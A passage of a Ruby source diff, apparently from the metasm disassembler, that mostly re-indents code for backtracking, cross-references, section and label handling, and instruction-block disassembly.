calladdr, expr, origin, maxdepth) + if btbind_callback + @btbind_callback[dasm, @backtrace_binding, funcaddr, calladdr, expr, origin, maxdepth] + elsif backtrace_binding and dest = @backtrace_binding[:thunk] and target = dasm.function[dest] + target.get_backtrace_binding(dasm, funcaddr, calladdr, expr, origin, maxdepth) + else + unk_regs = expr.externals.grep(Symbol).uniq - @backtrace_binding.keys - [:unknown] + dasm.cpu.backtrace_update_function_binding(dasm, funcaddr, self, return_address, *unk_regs) if not unk_regs.empty? + @backtrace_binding + end + end + + # if btfor_callback is defined, calls it with args [dasm, bt_for, funcaddr, calladdr] + # else return backtracked_for + def get_backtracked_for(dasm, funcaddr, calladdr) + if btfor_callback + @btfor_callback[dasm, @backtracked_for, funcaddr, calladdr] + elsif backtrace_binding and dest = @backtrace_binding[:thunk] and target = dasm.function[dest] + target.get_backtracked_for(dasm, funcaddr, calladdr) + else + @backtracked_for + end + end + + def initialize + @backtracked_for = [] + @backtrace_binding = {} + end end class CPU - # return the thing to backtrace to find +value+ before the execution of this instruction - # eg backtrace_emu('inc eax', Expression[:eax]) => Expression[:eax + 1] - # (the value of :eax after 'inc eax' is the value of :eax before plus 1) - # may return Expression::Unknown - def backtrace_emu(di, value) - Expression[Expression[value].bind(di.backtrace_binding ||= get_backtrace_binding(di)).reduce] - end - - # returns a list of Expressions/Integer to backtrace to find an execution target - def get_xrefs_x(dasm, di) - end - - # returns a list of [type, address, len] - def get_xrefs_rw(dasm, di) - get_xrefs_r(dasm, di).map { |addr, len| [:r, addr, len] } + get_xrefs_w(dasm, di).map { |addr, len| [:w, addr, len] } - end - - # returns a list [addr, len] - def get_xrefs_r(dasm, di) - b = di.backtrace_binding ||= get_backtrace_binding(di) - r = b.values - x = get_xrefs_x(dasm, di) - r |= x if x - (r.grep(Indirection) + r.grep(Expression).map { |e| e.expr_indirections }.flatten).map { |e| [e.target, e.len] } - end - - # returns a list [addr, len] - def get_xrefs_w(dasm, di) - b = di.backtrace_binding ||= get_backtrace_binding(di) - w = b.keys - (w.grep(Indirection) + w.grep(Expression).map { |e| e.expr_indirections }.flatten).map { |e| [e.target, e.len] } - end - - # checks if the expression corresponds to a function return value with the instruction - # (eg di == 'call something' and expr == [esp]) - def backtrace_is_function_return(expr, di=nil) - end - - # updates f.backtrace_binding when a new return address has been found - # TODO update also when anything changes inside the function (new loop found etc) - use backtracked_for ? - def backtrace_update_function_binding(dasm, faddr, f, retaddrlist, *wantregs) - end - - # returns if the expression is an address on the stack - # (to avoid trying to backtrace its absolute address until we found function boundaries) - def backtrace_is_stack_address(expr) - end - - # updates the instruction arguments: replace an expression with another (eg when a label is renamed) - def replace_instr_arg_immediate(i, old, new) - i.args.map! { |a| - case a - when Expression; Expression[a.bind(old => new).reduce] - else a - end - } - end - - # a callback called whenever a backtrace is successful - # di is the decodedinstruction at the backtrace's origin - def backtrace_found_result(dasm, di, expr, type, len) - end + # return the thing to backtrace to find +value+ before the execution of this instruction + # eg backtrace_emu('inc eax', Expression[:eax]) => Expression[:eax + 1] + # (the value of :eax after 'inc eax' is the value of :eax before plus 1) + # may return Expression::Unknown + def backtrace_emu(di, value) + Expression[Expression[value].bind(di.backtrace_binding ||= get_backtrace_binding(di)).reduce] + end + + # returns a list of Expressions/Integer to backtrace to find an execution target + def get_xrefs_x(dasm, di) + end + + # returns a list of [type, address, len] + def get_xrefs_rw(dasm, di) + get_xrefs_r(dasm, di).map { |addr, len| [:r, addr, len] } + get_xrefs_w(dasm, di).map { |addr, len| [:w, addr, len] } + end + + # returns a list [addr, len] + def get_xrefs_r(dasm, di) + b = di.backtrace_binding ||= get_backtrace_binding(di) + r = b.values + x = get_xrefs_x(dasm, di) + r |= x if x + (r.grep(Indirection) + r.grep(Expression).map { |e| e.expr_indirections }.flatten).map { |e| [e.target, e.len] } + end + + # returns a list [addr, len] + def get_xrefs_w(dasm, di) + b = di.backtrace_binding ||= get_backtrace_binding(di) + w = b.keys + (w.grep(Indirection) + w.grep(Expression).map { |e| e.expr_indirections }.flatten).map { |e| [e.target, e.len] } + end + + # checks if the expression corresponds to a function return value with the instruction + # (eg di == 'call something' and expr == [esp]) + def backtrace_is_function_return(expr, di=nil) + end + + # updates f.backtrace_binding when a new return address has been found + # TODO update also when anything changes inside the function (new loop found etc) - use backtracked_for ? + def backtrace_update_function_binding(dasm, faddr, f, retaddrlist, *wantregs) + end + + # returns if the expression is an address on the stack + # (to avoid trying to backtrace its absolute address until we found function boundaries) + def backtrace_is_stack_address(expr) + end + + # updates the instruction arguments: replace an expression with another (eg when a label is renamed) + def replace_instr_arg_immediate(i, old, new) + i.args.map! { |a| + case a + when Expression; Expression[a.bind(old => new).reduce] + else a + end + } + end + + # a callback called whenever a backtrace is successful + # di is the decodedinstruction at the backtrace's origin + def backtrace_found_result(dasm, di, expr, type, len) + end end class ExeFormat - # returns a string containing asm-style section declaration - def dump_section_header(addr, edata) - "\n// section at #{Expression[addr]}" - end + # returns a string containing asm-style section declaration + def dump_section_header(addr, edata) + "\n// section at #{Expression[addr]}" + end - # returns an array of expressions that may be executed by this instruction - def get_xrefs_x(dasm, di) @cpu.get_xrefs_x(dasm, di) end + # returns an array of expressions that may be executed by this instruction + def get_xrefs_x(dasm, di) @cpu.get_xrefs_x(dasm, di) end - # returns an array of [type, expression, length] that may be accessed by this instruction (type is :r/:w, len is in bytes) - def get_xrefs_rw(dasm, di) @cpu.get_xrefs_rw(dasm, di) end + # returns an array of [type, expression, length] that may be accessed by this instruction (type is :r/:w, len is in bytes) + def get_xrefs_rw(dasm, di) @cpu.get_xrefs_rw(dasm, di) end end # a disassembler class # holds a copy of a program sections, a list of decoded instructions, xrefs # is able to backtrace an expression from an address following the call flow (backwards) class Disassembler - attr_accessor :program, :cpu - # binding (jointure of @sections.values.exports) - attr_accessor :prog_binding - # hash addr => edata - attr_accessor :sections - # hash addr => DecodedInstruction - attr_accessor :decoded - # hash addr => DecodedFunction (includes 'imported' functions) - attr_accessor :function - # hash addr => (array of) xrefs - access with +add_xref+/+each_xref+ - attr_accessor :xrefs - # bool, true to check write xrefs on each instr disasm (default true) - attr_accessor :check_smc - # list of [addr to disassemble, (optional)who jumped to it, (optional)got there by a subfunction return] - attr_accessor :addrs_todo - # hash address => binding - attr_accessor :address_binding - # number of blocks to backtrace before aborting if no result is found (defaults to class.backtrace_maxblocks, 50 by default) - attr_accessor :backtrace_maxblocks - # maximum backtrace length for :r/:w, defaults to backtrace_maxblocks - attr_accessor :backtrace_maxblocks_data - # max bt length for backtrace_fast blocks, default=0 - attr_accessor :backtrace_maxblocks_fast - # max complexity for an Expr during backtrace before abort - attr_accessor :backtrace_maxcomplexity, :backtrace_maxcomplexity_data - # maximum number of instructions inside a basic block, split past this limit - attr_accessor :disassemble_maxblocklength - # a cparser that parsed some C header files, prototypes are converted to DecodedFunction when jumped to - attr_accessor :c_parser - # hash address => array of strings - # default dasm dump will only show comments at beginning of code blocks - attr_accessor :comment - # bool, set to true (default) if functions with undetermined binding should be assumed to return with ABI-conforming binding (conserve frame ptr) - attr_accessor :funcs_stdabi - # callback called whenever an instruction will backtrace :x (before the backtrace is started) - # arguments: |addr of origin, array of exprs to backtrace| - # must return the replacement array, nil == [] - attr_accessor :callback_newaddr - # called whenever an instruction is decoded and added to an instruction block. arg: the new decoded instruction - # returns the new di to consider (nil to end block) - attr_accessor :callback_newinstr - # called whenever the disassembler tries to disassemble an addresse that has been written to. arg: the address - attr_accessor :callback_selfmodifying - # called when the disassembler stops (stopexec/undecodable instruction) - attr_accessor :callback_stopaddr - # callback called before each backtrace that may take some time - attr_accessor :callback_prebacktrace - # callback called once all addresses have been disassembled - attr_accessor :callback_finished - # pointer to the gui widget we're displayed in - attr_accessor :gui - - @@backtrace_maxblocks = 50 - - # creates a new disassembler - def initialize(program, cpu=program.cpu) - reinitialize(program, cpu) - end - - # resets the program - def reinitialize(program, cpu=program.cpu) - @program = program - @cpu = cpu - @sections = {} - @decoded = {} - @xrefs = {} - @function = {} - @check_smc = true - @prog_binding = {} - @old_prog_binding = {} # same as prog_binding, but keep old var names - @addrs_todo = [] - @addrs_done = [] - @address_binding = {} - @backtrace_maxblocks = @@backtrace_maxblocks - @backtrace_maxblocks_fast = 0 - @backtrace_maxcomplexity = 40 - @backtrace_maxcomplexity_data = 5 - @disassemble_maxblocklength = 100 - @comment = {} - @funcs_stdabi = true - end - - # adds a section, updates prog_binding - # base addr is an Integer or a String (label name for offset 0) - def add_section(encoded, base) - encoded, base = base, encoded if base.kind_of? EncodedData - case base - when ::Integer - when ::String - raise "invalid section base #{base.inspect} - not at section start" if encoded.export[base] and encoded.export[base] != 0 - raise "invalid section base #{base.inspect} - already seen at #{@prog_binding[base]}" if @prog_binding[base] and @prog_binding[base] != Expression[base] - encoded.add_export base, 0 - else raise "invalid section base #{base.inspect} - expected string or integer" - end - - @sections[base] = encoded - @label_alias_cache = nil - encoded.binding(base).each { |k, v| - @old_prog_binding[k] = @prog_binding[k] = v.reduce - } - - # update section_edata.reloc - # label -> list of relocs that refers to it - @inv_section_reloc = {} - @sections.each { |b, e| - e.reloc.each { |o, r| - r.target.externals.grep(::String).each { |ext| (@inv_section_reloc[ext] ||= []) << [b, e, o, r] } - } - } - - self - end - - def add_xref(addr, x) - case @xrefs[addr] - when nil; @xrefs[addr] = x - when x - when ::Array; @xrefs[addr] |= [x] - else @xrefs[addr] = [@xrefs[addr], x] - end - end - - # yields each xref to a given address, optionnaly restricted to a type - def each_xref(addr, type=nil) - addr = normalize addr - - x = @xrefs[addr] - x = case x - when nil; [] - when ::Array; x.dup - else [x] - end - - x.delete_if { |x_| x_.type != type } if type - - # add pseudo-xrefs for exe relocs - if (not type or type == :reloc) and l = get_label_at(addr) and a = @inv_section_reloc[l] - a.each { |b, e, o, r| - addr = Expression[b]+o - # ignore relocs embedded in an already-listed instr - x << Xref.new(:reloc, addr) if not x.find { |x_| - next if not x_.origin or not di_at(x_.origin) - (addr - x_.origin rescue 50) < @decoded[x_.origin].bin_length - } - } - end - - x.each { |x_| yield x_ } - end - - # parses a C header file, from which function prototypes will be converted to DecodedFunction when found in the code flow - def parse_c_file(file) - parse_c File.read(file), file - end - - # parses a C string for function prototypes - def parse_c(str, filename=nil, lineno=1) - @c_parser ||= @cpu.new_cparser - @c_parser.lexer.define_weak('__METASM__DECODE__') - @c_parser.parse(str, filename, lineno) - end - - # returns the canonical form of addr (absolute address integer or label of start of section + section offset) - def normalize(addr) - return addr if not addr or addr == :default - addr = Expression[addr].bind(@old_prog_binding).reduce if not addr.kind_of? Integer - addr %= 1 << [@cpu.size, 32].max if @cpu and addr.kind_of? Integer - addr - end - - # returns [edata, edata_base] or nil - # edata.ptr points to addr - def get_section_at(addr, memcheck=true) - case addr = normalize(addr) - when ::Integer - if s = @sections.find { |b, e| b.kind_of? ::Integer and addr >= b and addr < b + e.length } || - @sections.find { |b, e| b.kind_of? ::Integer and addr == b + e.length } # end label - s[1].ptr = addr - s[0] - return if memcheck and s[1].data.respond_to?(:page_invalid?) and s[1].data.page_invalid?(s[1].ptr) - [s[1], s[0]] - end - when Expression - if addr.op == :+ and addr.rexpr.kind_of? ::Integer and addr.rexpr >= 0 and addr.lexpr.kind_of? ::String and e = @sections[addr.lexpr] - e.ptr = addr.rexpr - return if memcheck and e.data.respond_to?(:page_invalid?) and e.data.page_invalid?(e.ptr) - [e, Expression[addr.lexpr]] - elsif addr.op == :+ and addr.rexpr.kind_of? ::String and not addr.lexpr and e = @sections[addr.rexpr] - e.ptr = 0 - return if memcheck and e.data.respond_to?(:page_invalid?) and e.data.page_invalid?(e.ptr) - [e, addr.rexpr] - end - end - end - - # returns the label at the specified address, creates it if needed using "prefix_addr" - # renames the existing label if it is in the form rewritepfx_addr - # returns nil if the address is not known and is not a string - def auto_label_at(addr, base='xref', *rewritepfx) - addr = Expression[addr].reduce - addrstr = "#{base}_#{Expression[addr]}" - return if addrstr !~ /^\w+$/ - e, b = get_section_at(addr) - if not e - l = Expression[addr].reduce_rec if Expression[addr].reduce_rec.kind_of? ::String - l ||= addrstr if addr.kind_of? Expression and addr.externals.grep(::Symbol).empty? - elsif not l = e.inv_export[e.ptr] - l = @program.new_label(addrstr) - e.add_export l, e.ptr - @label_alias_cache = nil - @old_prog_binding[l] = @prog_binding[l] = b + e.ptr - elsif rewritepfx.find { |p| base != p and addrstr.sub(base, p) == l } - newl = addrstr - newl = @program.new_label(newl) unless @old_prog_binding[newl] and @old_prog_binding[newl] == @prog_binding[l] # avoid _uuid when a -> b -> a - rename_label l, newl - l = newl - end - l - end - - # returns a hash associating addr => list of labels at this addr - def label_alias - if not @label_alias_cache - @label_alias_cache = {} - @prog_binding.each { |k, v| - (@label_alias_cache[v] ||= []) << k - } - end - @label_alias_cache - end - - # decodes instructions from an entrypoint, (tries to) follows code flow - def disassemble(*entrypoints) - nil while disassemble_mainiter(entrypoints) - self - end - - attr_accessor :entrypoints - - # do one operation relevant to disassembling - # returns nil once done - def disassemble_mainiter(entrypoints=[]) - @entrypoints ||= [] - if @addrs_todo.empty? and entrypoints.empty? - post_disassemble - puts 'disassembly finished' if $VERBOSE - @callback_finished[] if callback_finished - return false - elsif @addrs_todo.empty? - ep = entrypoints.shift - l = auto_label_at(normalize(ep), 'entrypoint') - puts "start disassemble from #{l} (#{entrypoints.length})" if $VERBOSE and not entrypoints.empty? - @entrypoints << l - @addrs_todo << [ep] - else - disassemble_step - end - true - end - - def post_disassemble - @decoded.each_value { |di| - next if not di.kind_of? DecodedInstruction - next if not di.opcode or not di.opcode.props[:saveip] - if not di.block.to_subfuncret - di.add_comment 'noreturn' - # there is no need to re-loop on all :saveip as check_noret is transitive - di.block.each_to_normal { |fa| check_noreturn_function(fa) } - end - } - @function.each { |addr, f| - next if not @decoded[addr] - if not f.finalized - f.finalized = true + attr_accessor :program, :cpu + # binding (jointure of @sections.values.exports) + attr_accessor :prog_binding + # hash addr => edata + attr_accessor :sections + # hash addr => DecodedInstruction + attr_accessor :decoded + # hash addr => DecodedFunction (includes 'imported' functions) + attr_accessor :function + # hash addr => (array of) xrefs - access with +add_xref+/+each_xref+ + attr_accessor :xrefs + # bool, true to check write xrefs on each instr disasm (default true) + attr_accessor :check_smc + # list of [addr to disassemble, (optional)who jumped to it, (optional)got there by a subfunction return] + attr_accessor :addrs_todo + # hash address => binding + attr_accessor :address_binding + # number of blocks to backtrace before aborting if no result is found (defaults to class.backtrace_maxblocks, 50 by default) + attr_accessor :backtrace_maxblocks + # maximum backtrace length for :r/:w, defaults to backtrace_maxblocks + attr_accessor :backtrace_maxblocks_data + # max bt length for backtrace_fast blocks, default=0 + attr_accessor :backtrace_maxblocks_fast + # max complexity for an Expr during backtrace before abort + attr_accessor :backtrace_maxcomplexity, :backtrace_maxcomplexity_data + # maximum number of instructions inside a basic block, split past this limit + attr_accessor :disassemble_maxblocklength + # a cparser that parsed some C header files, prototypes are converted to DecodedFunction when jumped to + attr_accessor :c_parser + # hash address => array of strings + # default dasm dump will only show comments at beginning of code blocks + attr_accessor :comment + # bool, set to true (default) if functions with undetermined binding should be assumed to return with ABI-conforming binding (conserve frame ptr) + attr_accessor :funcs_stdabi + # callback called whenever an instruction will backtrace :x (before the backtrace is started) + # arguments: |addr of origin, array of exprs to backtrace| + # must return the replacement array, nil == [] + attr_accessor :callback_newaddr + # called whenever an instruction is decoded and added to an instruction block. arg: the new decoded instruction + # returns the new di to consider (nil to end block) + attr_accessor :callback_newinstr + # called whenever the disassembler tries to disassemble an addresse that has been written to. arg: the address + attr_accessor :callback_selfmodifying + # called when the disassembler stops (stopexec/undecodable instruction) + attr_accessor :callback_stopaddr + # callback called before each backtrace that may take some time + attr_accessor :callback_prebacktrace + # callback called once all addresses have been disassembled + attr_accessor :callback_finished + # pointer to the gui widget we're displayed in + attr_accessor :gui + + @@backtrace_maxblocks = 50 + + # creates a new disassembler + def initialize(program, cpu=program.cpu) + reinitialize(program, cpu) + end + + # resets the program + def reinitialize(program, cpu=program.cpu) + @program = program + @cpu = cpu + @sections = {} + @decoded = {} + @xrefs = {} + @function = {} + @check_smc = true + @prog_binding = {} + @old_prog_binding = {} # same as prog_binding, but keep old var names + @addrs_todo = [] + @addrs_done = [] + @address_binding = {} + @backtrace_maxblocks = @@backtrace_maxblocks + @backtrace_maxblocks_fast = 0 + @backtrace_maxcomplexity = 40 + @backtrace_maxcomplexity_data = 5 + @disassemble_maxblocklength = 100 + @comment = {} + @funcs_stdabi = true + end + + # adds a section, updates prog_binding + # base addr is an Integer or a String (label name for offset 0) + def add_section(encoded, base) + encoded, base = base, encoded if base.kind_of? EncodedData + case base + when ::Integer + when ::String + raise "invalid section base #{base.inspect} - not at section start" if encoded.export[base] and encoded.export[base] != 0 + raise "invalid section base #{base.inspect} - already seen at #{@prog_binding[base]}" if @prog_binding[base] and @prog_binding[base] != Expression[base] + encoded.add_export base, 0 + else raise "invalid section base #{base.inspect} - expected string or integer" + end + + @sections[base] = encoded + @label_alias_cache = nil + encoded.binding(base).each { |k, v| + @old_prog_binding[k] = @prog_binding[k] = v.reduce + } + + # update section_edata.reloc + # label -> list of relocs that refers to it + @inv_section_reloc = {} + @sections.each { |b, e| + e.reloc.each { |o, r| + r.target.externals.grep(::String).each { |ext| (@inv_section_reloc[ext] ||= []) << [b, e, o, r] } + } + } + + self + end + + def add_xref(addr, x) + case @xrefs[addr] + when nil; @xrefs[addr] = x + when x + when ::Array; @xrefs[addr] |= [x] + else @xrefs[addr] = [@xrefs[addr], x] + end + end + + # yields each xref to a given address, optionnaly restricted to a type + def each_xref(addr, type=nil) + addr = normalize addr + + x = @xrefs[addr] + x = case x + when nil; [] + when ::Array; x.dup + else [x] + end + + x.delete_if { |x_| x_.type != type } if type + + # add pseudo-xrefs for exe relocs + if (not type or type == :reloc) and l = get_label_at(addr) and a = @inv_section_reloc[l] + a.each { |b, e, o, r| + addr = Expression[b]+o + # ignore relocs embedded in an already-listed instr + x << Xref.new(:reloc, addr) if not x.find { |x_| + next if not x_.origin or not di_at(x_.origin) + (addr - x_.origin rescue 50) < @decoded[x_.origin].bin_length + } + } + end + + x.each { |x_| yield x_ } + end + + # parses a C header file, from which function prototypes will be converted to DecodedFunction when found in the code flow + def parse_c_file(file) + parse_c File.read(file), file + end + + # parses a C string for function prototypes + def parse_c(str, filename=nil, lineno=1) + @c_parser ||= @cpu.new_cparser + @c_parser.lexer.define_weak('__METASM__DECODE__') + @c_parser.parse(str, filename, lineno) + end + + # returns the canonical form of addr (absolute address integer or label of start of section + section offset) + def normalize(addr) + return addr if not addr or addr == :default + addr = Expression[addr].bind(@old_prog_binding).reduce if not addr.kind_of? Integer + addr %= 1 << [@cpu.size, 32].max if @cpu and addr.kind_of? Integer + addr + end + + # returns [edata, edata_base] or nil + # edata.ptr points to addr + def get_section_at(addr, memcheck=true) + case addr = normalize(addr) + when ::Integer + if s = @sections.find { |b, e| b.kind_of? ::Integer and addr >= b and addr < b + e.length } || + @sections.find { |b, e| b.kind_of? ::Integer and addr == b + e.length } # end label + s[1].ptr = addr - s[0] + return if memcheck and s[1].data.respond_to?(:page_invalid?) and s[1].data.page_invalid?(s[1].ptr) + [s[1], s[0]] + end + when Expression + if addr.op == :+ and addr.rexpr.kind_of? ::Integer and addr.rexpr >= 0 and addr.lexpr.kind_of? ::String and e = @sections[addr.lexpr] + e.ptr = addr.rexpr + return if memcheck and e.data.respond_to?(:page_invalid?) and e.data.page_invalid?(e.ptr) + [e, Expression[addr.lexpr]] + elsif addr.op == :+ and addr.rexpr.kind_of? ::String and not addr.lexpr and e = @sections[addr.rexpr] + e.ptr = 0 + return if memcheck and e.data.respond_to?(:page_invalid?) and e.data.page_invalid?(e.ptr) + [e, addr.rexpr] + end + end + end + + # returns the label at the specified address, creates it if needed using "prefix_addr" + # renames the existing label if it is in the form rewritepfx_addr + # returns nil if the address is not known and is not a string + def auto_label_at(addr, base='xref', *rewritepfx) + addr = Expression[addr].reduce + addrstr = "#{base}_#{Expression[addr]}" + return if addrstr !~ /^\w+$/ + e, b = get_section_at(addr) + if not e + l = Expression[addr].reduce_rec if Expression[addr].reduce_rec.kind_of? ::String + l ||= addrstr if addr.kind_of? Expression and addr.externals.grep(::Symbol).empty? + elsif not l = e.inv_export[e.ptr] + l = @program.new_label(addrstr) + e.add_export l, e.ptr + @label_alias_cache = nil + @old_prog_binding[l] = @prog_binding[l] = b + e.ptr + elsif rewritepfx.find { |p| base != p and addrstr.sub(base, p) == l } + newl = addrstr + newl = @program.new_label(newl) unless @old_prog_binding[newl] and @old_prog_binding[newl] == @prog_binding[l] # avoid _uuid when a -> b -> a + rename_label l, newl + l = newl + end + l + end + + # returns a hash associating addr => list of labels at this addr + def label_alias + if not @label_alias_cache + @label_alias_cache = {} + @prog_binding.each { |k, v| + (@label_alias_cache[v] ||= []) << k + } + end + @label_alias_cache + end + + # decodes instructions from an entrypoint, (tries to) follows code flow + def disassemble(*entrypoints) + nil while disassemble_mainiter(entrypoints) + self + end + + attr_accessor :entrypoints + + # do one operation relevant to disassembling + # returns nil once done + def disassemble_mainiter(entrypoints=[]) + @entrypoints ||= [] + if @addrs_todo.empty? and entrypoints.empty? + post_disassemble + puts 'disassembly finished' if $VERBOSE + @callback_finished[] if callback_finished + return false + elsif @addrs_todo.empty? + ep = entrypoints.shift + l = auto_label_at(normalize(ep), 'entrypoint') + puts "start disassemble from #{l} (#{entrypoints.length})" if $VERBOSE and not entrypoints.empty? + @entrypoints << l + @addrs_todo << [ep] + else + disassemble_step + end + true + end + + def post_disassemble + @decoded.each_value { |di| + next if not di.kind_of? DecodedInstruction + next if not di.opcode or not di.opcode.props[:saveip] + if not di.block.to_subfuncret + di.add_comment 'noreturn' + # there is no need to re-loop on all :saveip as check_noret is transitive + di.block.each_to_normal { |fa| check_noreturn_function(fa) } + end + } + @function.each { |addr, f| + next if not @decoded[addr] + if not f.finalized + f.finalized = true puts " finalize subfunc #{Expression[addr]}" if debug_backtrace - @cpu.backtrace_update_function_binding(self, addr, f, f.return_address) - if not f.return_address - detect_function_thunk(addr) - end - end - @comment[addr] ||= [] - bd = f.backtrace_binding.reject { |k, v| Expression[k] == Expression[v] or Expression[v] == Expression::Unknown } - unk = f.backtrace_binding.map { |k, v| k if v == Expression::Unknown }.compact - bd[unk.map { |u| Expression[u].to_s }.sort.join(',')] = Expression::Unknown if not unk.empty? - @comment[addr] |= ["function binding: " + bd.map { |k, v| "#{k} -> #{v}" }.sort.join(', ')] - @comment[addr] |= ["function ends at " + f.return_address.map { |ra| Expression[ra] }.join(', ')] if f.return_address - } - end - - # disassembles one block from addrs_todo - # adds next addresses to handle to addrs_todo - # if @function[:default] exists, jumps to unknows locations are interpreted as to @function[:default] - def disassemble_step - return if not todo = @addrs_todo.pop or @addrs_done.include? todo - @addrs_done << todo if todo[1] - - # from_sfret is true if from is the address of a function call that returns to addr - addr, from, from_subfuncret = todo - - return if from == Expression::Unknown - - puts "disassemble_step #{Expression[addr]} #{Expression[from] if from} #{from_subfuncret} (/#{@addrs_todo.length})" if $DEBUG - - addr = normalize(addr) - - if from and from_subfuncret and di_at(from) - @decoded[from].block.each_to_normal { |subfunc| - subfunc = normalize(subfunc) - next if not f = @function[subfunc] or f.finalized - f.finalized = true + @cpu.backtrace_update_function_binding(self, addr, f, f.return_address) + if not f.return_address + detect_function_thunk(addr) + end + end + @comment[addr] ||= [] + bd = f.backtrace_binding.reject { |k, v| Expression[k] == Expression[v] or Expression[v] == Expression::Unknown } + unk = f.backtrace_binding.map { |k, v| k if v == Expression::Unknown }.compact + bd[unk.map { |u| Expression[u].to_s }.sort.join(',')] = Expression::Unknown if not unk.empty? + @comment[addr] |= ["function binding: " + bd.map { |k, v| "#{k} -> #{v}" }.sort.join(', ')] + @comment[addr] |= ["function ends at " + f.return_address.map { |ra| Expression[ra] }.join(', ')] if f.return_address + } + end + + # disassembles one block from addrs_todo + # adds next addresses to handle to addrs_todo + # if @function[:default] exists, jumps to unknows locations are interpreted as to @function[:default] + def disassemble_step + return if not todo = @addrs_todo.pop or @addrs_done.include? todo + @addrs_done << todo if todo[1] + + # from_sfret is true if from is the address of a function call that returns to addr + addr, from, from_subfuncret = todo + + return if from == Expression::Unknown + + puts "disassemble_step #{Expression[addr]} #{Expression[from] if from} #{from_subfuncret} (/#{@addrs_todo.length})" if $DEBUG + + addr = normalize(addr) + + if from and from_subfuncret and di_at(from) + @decoded[from].block.each_to_normal { |subfunc| + subfunc = normalize(subfunc) + next if not f = @function[subfunc] or f.finalized + f.finalized = true puts " finalize subfunc #{Expression[subfunc]}" if debug_backtrace - @cpu.backtrace_update_function_binding(self, subfunc, f, f.return_address) - if not f.return_address - detect_function_thunk(subfunc) - end - } - end - - if di = @decoded[addr] - if di.kind_of? DecodedInstruction - split_block(di.block, di.address) if not di.block_head? # this updates di.block - di.block.add_from(from, from_subfuncret ? :subfuncret : :normal) if from and from != :default - bf = di.block - elsif di == true - bf = @function[addr] - end - elsif bf = @function[addr] - detect_function_thunk_noreturn(from) if bf.noreturn - elsif s = get_section_at(addr) - block = InstructionBlock.new(normalize(addr), s[0]) - block.add_from(from, from_subfuncret ? :subfuncret : :normal) if from and from != :default - disassemble_block(block) - elsif from and c_parser and name = Expression[addr].reduce_rec and name.kind_of? ::String and - s = c_parser.toplevel.symbol[name] and s.type.untypedef.kind_of? C::Function - bf = @function[addr] = @cpu.decode_c_function_prototype(@c_parser, s) - detect_function_thunk_noreturn(from) if bf.noreturn - elsif from - if bf = @function[:default] - puts "using default function for #{Expression[addr]} from #{Expression[from]}" if $DEBUG - if name = Expression[addr].reduce_rec and name.kind_of? ::String - @function[addr] = @function[:default].dup - else - addr = :default - end - if @decoded[from] - @decoded[from].block.add_to addr - end - else - puts "not disassembling unknown address #{Expression[addr]} from #{Expression[from]}" if $DEBUG - end - if from != :default - add_xref(addr, Xref.new(:x, from)) - add_xref(Expression::Unknown, Xref.new(:x, from)) - end - else - puts "not disassembling unknown address #{Expression[addr]}" if $VERBOSE - end - - if bf and from and from != :default - if bf.kind_of? DecodedFunction - bff = bf.get_backtracked_for(self, addr, from) - else - bff = bf.backtracked_for - end - end - bff.each { |btt| - next if btt.address - if @decoded[from].kind_of? DecodedInstruction and @decoded[from].opcode.props[:saveip] and not from_subfuncret and not @function[addr] - backtrace_check_found(btt.expr, @decoded[addr], btt.origin, btt.type, btt.len, btt.maxdepth, btt.detached) - end - next if backtrace_check_funcret(btt, addr, from) - backtrace(btt.expr, from, - :include_start => true, :from_subfuncret => from_subfuncret, - :origin => btt.origin, :orig_expr => btt.orig_expr, :type => btt.type, - :len => btt.len, :detached => btt.detached, :maxdepth => btt.maxdepth) - } if bff - end - - # splits an InstructionBlock, updates the blocks backtracked_for - def split_block(block, address=nil) - if not address # invoked as split_block(0x401012) - return if not @decoded[block].kind_of? DecodedInstruction - block, address = @decoded[block].block, block - end - return block if address == block.address - new_b = block.split address - new_b.backtracked_for.dup.each { |btt| - backtrace(btt.expr, btt.address, - :only_upto => block.list.last.address, - :include_start => !btt.exclude_instr, :from_subfuncret => btt.from_subfuncret, - :origin => btt.origin, :orig_expr => btt.orig_expr, :type => btt.type, :len => btt.len, - :detached => btt.detached, :maxdepth => btt.maxdepth) - } - new_b - end - - # disassembles a new instruction block at block.address (must be normalized) - def disassemble_block(block) - raise if not block.list.empty? - di_addr = block.address - delay_slot = nil - di = nil - - # try not to run for too long - # loop usage: break if the block continues to the following instruction, else return - @disassemble_maxblocklength.times { - # check collision into a known block - break if @decoded[di_addr] - - # check self-modifying code - if @check_smc - #(-7...di.bin_length).each { |off| # uncomment to check for unaligned rewrites - waddr = di_addr #di_addr + off - each_xref(waddr, :w) { |x| - #next if off + x.len < 0 - puts "W: disasm: self-modifying code at #{Expression[waddr]}" if $VERBOSE - @comment[di_addr] ||= [] - @comment[di_addr] |= ["overwritten by #{@decoded[x.origin]}"] - @callback_selfmodifying[di_addr] if callback_selfmodifying - return - } - #} - end - - # decode instruction - block.edata.ptr = di_addr - block.address + block.edata_ptr - if not di = @cpu.decode_instruction(block.edata, di_addr) - ed = block.edata - puts "#{ed.ptr >= ed.length ? "end of section reached" : "unknown instruction #{ed.data[di_addr-block.address+block.edata_ptr, 4].to_s.unpack('H*')}"} at #{Expression[di_addr]}" if $VERBOSE - return - end - - @decoded[di_addr] = di - block.add_di di - puts di if $DEBUG - - di = @callback_newinstr[di] if callback_newinstr - return if not di - block = di.block - - di_addr = di.next_addr - - backtrace_xrefs_di_rw(di) - - if not di_addr or di.opcode.props[:stopexec] or not @program.get_xrefs_x(self, di).empty? - # do not backtrace until delay slot is finished (eg MIPS: di is a - # ret and the delay slot holds stack fixup needed to calc func_binding) - # XXX if the delay slot is also xref_x or :stopexec it is ignored - delay_slot ||= [di, @cpu.delay_slot(di)] - end - - if delay_slot - di, delay = delay_slot - if delay == 0 or not di_addr - backtrace_xrefs_di_x(di) - if di.opcode.props[:stopexec] or not di_addr; return - else break - end - end - delay_slot[1] = delay - 1 - end - } - - ar = [di_addr] - ar = @callback_newaddr[block.list.last.address, ar] || ar if callback_newaddr - ar.each { |di_addr_| backtrace(di_addr_, di.address, :origin => di.address, :type => :x) } - - block - end - - # retrieve the list of execution crossrefs due to the decodedinstruction - # returns a list of symbolic expressions - def get_xrefs_x(di) - @program.get_xrefs_x(self, di) - end - - # retrieve the list of data r/w crossrefs due to the decodedinstruction - # returns a list of [type, symbolic expression, length] - def get_xrefs_rw(di) - @program.get_xrefs_rw(self, di) - end - - # disassembles_fast from a list of entrypoints, also dasm subfunctions - def disassemble_fast_deep(*entrypoints) - @entrypoints ||= [] - @entrypoints |= entrypoints - - entrypoints.each { |ep| do_disassemble_fast_deep(normalize(ep)) } 